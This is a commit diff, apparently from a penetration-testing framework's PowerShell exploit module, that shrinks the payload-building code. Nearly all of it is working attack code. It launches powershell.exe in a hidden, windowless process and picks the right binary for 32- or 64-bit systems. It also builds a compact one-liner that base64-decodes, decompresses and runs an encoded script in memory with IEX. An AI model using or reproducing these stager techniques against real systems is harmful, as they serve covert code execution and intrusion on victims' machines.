Reduce payload size
Meatballs
parent
b10df54dbb
commit
c76862b391
|
|
@ -183,33 +183,25 @@ module Exploit::Powershell
|
|||
end
|
||||
|
||||
process_start_info = <<EOS
|
||||
$si=New-Object System.Diagnostics.ProcessStartInfo
|
||||
$si.FileName=$ps_bin
|
||||
$si.Arguments='#{ps_args}'
|
||||
$si.UseShellExecute=$false
|
||||
$si.RedirectStandardOutput=$true
|
||||
$si.WindowStyle='Hidden'
|
||||
$si.CreateNoWindow=$true
|
||||
$p=[System.Diagnostics.Process]::Start($si)
|
||||
$s=New-Object System.Diagnostics.ProcessStartInfo
|
||||
$s.FileName=$b
|
||||
$s.Arguments='#{ps_args}'
|
||||
$s.UseShellExecute=$false
|
||||
$s.RedirectStandardOutput=$true
|
||||
$s.WindowStyle='Hidden'
|
||||
$s.CreateNoWindow=$true
|
||||
$p=[System.Diagnostics.Process]::Start($s)
|
||||
EOS
|
||||
process_start_info.gsub!("\n",';')
|
||||
|
||||
|
||||
archictecure_detection = <<EOS
|
||||
$x86=#{arch_x86};
|
||||
if ([IntPtr]::Size -eq 4) {
|
||||
if ($x86) {
|
||||
$ps_bin='powershell.exe'
|
||||
} else {
|
||||
$ps_bin=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
}
|
||||
} else {
|
||||
if ($x86) {
|
||||
$ps_bin=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
} else {
|
||||
$ps_bin='powershell.exe'
|
||||
}
|
||||
};
|
||||
$a=#{arch_x86};
|
||||
if([IntPtr]::Size -eq 4){
|
||||
if($a){$b='powershell.exe'}
|
||||
else{$b=$env:windir+'\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe'}
|
||||
}else{
|
||||
if($a){$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
}else{$b='powershell.exe'}};
|
||||
EOS
|
||||
archictecure_detection.gsub!("\n","")
|
||||
archictecure_detection.gsub!("\s\s","")
|
||||
|
|
@ -269,7 +261,7 @@ EOS
|
|||
command = "%COMSPEC% /b /c #{psh_command}"
|
||||
end
|
||||
|
||||
vprint_status("Command length: #{command.length}")
|
||||
vprint_status("Powershell command length: #{command.length}")
|
||||
return command
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -54,14 +54,11 @@ module Powershell
|
|||
|
||||
# Build the powershell expression
|
||||
# Decode base64 encoded command and create a stream object
|
||||
psh_expression = "$s=New-Object IO.MemoryStream(,"
|
||||
psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression << "$(IEX $(New-Object IO.StreamReader("
|
||||
psh_expression << "$(New-Object IO.Compression.GzipStream("
|
||||
psh_expression << "$s,"
|
||||
psh_expression = "IEX(New-Object IO.StreamReader("
|
||||
psh_expression << "(New-Object IO.Compression.GzipStream("
|
||||
psh_expression << "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('#{encoded_stream}'))),"
|
||||
psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
|
||||
psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd();"
|
||||
|
||||
# If eof is set, add a marker to signify end of code output
|
||||
#if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
|
||||
|
|
|
|||
Loading…
Reference in New Issue